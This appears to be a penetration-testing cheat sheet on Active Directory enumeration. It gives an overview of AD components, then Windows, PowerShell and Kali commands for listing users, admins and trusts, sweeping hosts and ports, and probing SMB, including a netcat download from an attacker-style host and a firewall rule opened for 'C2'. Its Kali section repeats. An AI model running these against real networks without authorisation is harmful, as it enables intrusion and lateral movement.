Active Directory Enumeration

Enumerating Active Directory can provide valuable information about the network's structure and potential vulnerabilities during penetration testing

Active Directory Components

  • Domain Controllers:

    • Holds the AD DS data store

    • Handles authentication and authorization services

    • Replicate updates from other domain controllers in the forest

    • Allows admin access to manage domain resources

  • AD DS Data Store:

    • Contains NTDS.dit which contains all AD DC information including password hashes for domain users

    • Stored by default in %SystemRoot%\NTDS

    • Accessible only by the domain controller

  • Forest

    • Container that holds pieces of AD network

    • Forest is a collection of one or more domain trees inside

    • Forest consists of:

      • Trees - A hierarchy of domains in Active Directory Domain Services

      • Domains - Used to group and manage objects

      • Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs

      • Trusts - Allows users to access resources in other domains

      • Objects - users, groups, printers, computers, shares

      • Domain Services - DNS Server, LLMNR, IPv6

      • Domain Schema - Rules for object creation

  • Users

    • 4 primary types of user accounts:

      • Domain admins

      • Service accounts

      • Local administrators

      • Domain users

  • Groups

    • Distribution groups: specify email distribution lists

    • Security groups: specify permissions for large number of users, including the following default security groups:

      • Domain Controllers - All domain controllers in the domain

      • Domain Guests - All domain guests

      • Domain Users - All domain users

      • Domain Computers - All workstations and servers joined to the domain

      • Domain Admins - Designated administrators of the domain

      • Enterprise Admins - Designated administrators of the enterprise

      • Schema Admins - Designated administrators of the schema

      • DNS Admins - DNS Administrators Group

      • DNS Update Proxy - DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).

      • Allowed RODC Password Replication Group - Members in this group can have their passwords replicated to all read-only domain controllers in the domain

      • Group Policy Creator Owners - Members in this group can modify group policy for the domain Denied RODC Password Replication Group - Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain

      • Protected Users - Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information.

      • Cert Publishers - Members of this group are permitted to publish certificates to the directory

      • Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the domain

      • Enterprise Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the enterprise

      • Key Admins - Members of this group can perform administrative actions on key objects within the domain.

      • Enterprise Key Admins - Members of this group can perform administrative actions on key objects within the forest.

      • Cloneable Domain Controllers - Members of this group that are domain controllers may be cloned.

      • RAS and IAS Servers - Servers in this group can access remote access properties of users

  • Domain Trusts

    • Put rules into place about domain interactions

    • Trusts allow users to gain access to other domain resources

    • Types of trusts:

      • Directional - The direction of the trust flows from a trusting domain to a trusted domain

      • Transitive - The trust relationship expands beyond just two domains to include other trusted domains

  • Domain Policies

    • Like domain groups, except instead of permissions they contain rules

  • Active Directory Domain Services

    • Services that a domain controller provides to the rest of the domain or tree

CMD Tools

Domain User Info with CMD

Enumerating with PowerShell

A simple batch script with these commands is here: \tools\WinDomainEnum.bat

Display DC Address, Domain Name, Roles

wmic ntdomain

Dsquery User List

dsquery user domainroot

User Logon Name from Email

dsquery * domainroot -filter "(&(objectCategory=Person)(objectClass=User)(mail=e-mailaddress))" -attr name

Display Trusted Domain

dsquery * -filter "(objectclass=TrustedDomain)" -attr trustpartner,flatname,trustdirection

Domain Admins of from Remote Trused Domain

dsquery * -filter "(cn=Domain Admins)" -attr member -d trustedDomain

Display All Domain Users

wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname

Display All Domain Groups

wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname

Display All Domain Computers

wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname

View Domain User Info

net user /domain
 net user pentestuser /domain

Display Domain Admin Users

net group “Domain Admins” /domain

View All Hosts in Domain/Workgroup

net view

Display Network Shares

net share

Display Domain Trust Info

nltest
 nltest /finduser:sweppler
 nltest /dclist:mydomain
 nltest /trusted_domains
@echo off

echo Enumerating Active Directory objects...

dsquery * -filter "(objectCategory=user)" > ad_users.txt
dsquery * -filter "(objectCategory=group)" > ad_groups.txt
dsquery * -filter "(objectCategory=computer)" > ad_computers.txt

echo Active Directory information has been saved to the following files:
echo ad_users.txt
echo ad_groups.txt
echo ad_computers.txt

PowerShell Tools

Ping Sweeper

 1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_ | Select-String ttl}

Port Sweeper

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("<IPADDR>", $_)) "Port $_ is open!"} 2>$null

Sweep Range of IPs for Single Port

foreach ($ip in 1..20) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.1.$ip}

Sweep IPs and Ports

1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.0.0.$a",$_)) "Port $_ is open!"} 2>$null}

Test Egress Filtering

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("allports.exposed",$_)) "Port $_ is open" } 2>$null

Display Domain Admins

([adsisearcher]"(&(objectClass=User)(admincount=1))").FindAll().Properties.samaccountname

Display Accounts that Don't Lock Out

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))"

Web Client to Download Files (eg NetCat)

wget "http://10.10.10.10/nc.exe" -outfile "c:\nc.exe"

Get Firewall Rules

Get-NetFirewallRule -all | Out-GridView
 Get-NetFirewallRule -all | Export-csv <file_path.csv>

Add Firewall Rule

New-NetFirewallRule -Action Allow -DisplayName Pentester-C2 -RemoteAddress <IPADDR>

Generate CSV with User Info

Import-Module ActiveDirectory

$results = @()

Get-ADObject -Filter * -SearchBase "LDAP://dc=mydomain,dc=local" |
ForEach-Object {
    $results += $_
}

$results | Select-Object Name, ObjectClass, DistinguishedName |
Export-Csv -Path "C:\ADObjects.csv" -NoTypeInformation

Linux/Kali Tools

SMB Enumeration Tools

nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain

nbtscan 192.168.1.0/24

Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

enum4linux -a target-ip

Fingerprint SMB Version

smbclient -L //192.168.1.100

Find open SMB Shares in Nmap

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24

Enumerate SMB Users in Nmap

nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254

Enumerate SMB Using Samrdump Python Impacket

python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX

Linux/Kali Tools

SMB Enumeration Tools

nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain

nbtscan 192.168.1.0/24

Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

enum4linux -a target-ip

Fingerprint SMB Version

smbclient -L //192.168.1.100

Find open SMB Shares in Nmap

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24

Enumerate SMB Users in Nmap

nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254

Enumerate SMB Using Samrdump Python Impacket

python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX

ridenum.py 192.168.XXX.XXX 500 50000 dict.txt https://github.com/trustedsec/ridenum

Metasploit RID Cycling

use auxiliary/scanner/smb/smb_lookupsid

Resources

https://www.hackingarticles.in/impacket-guide-smb-msrpc/

https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/

A simple batch script with these commands is here: \tools\WinDomainEnum.bat

"C:\Code\Penetration-Testing - Working\tools\WindowsEnum.ps1"

"C:\Code\Penetration-Testing - Working\tools\WinUserEnum.bat"

PreviousPowerViewNextWindows Post Exploitation Discovery

Last updated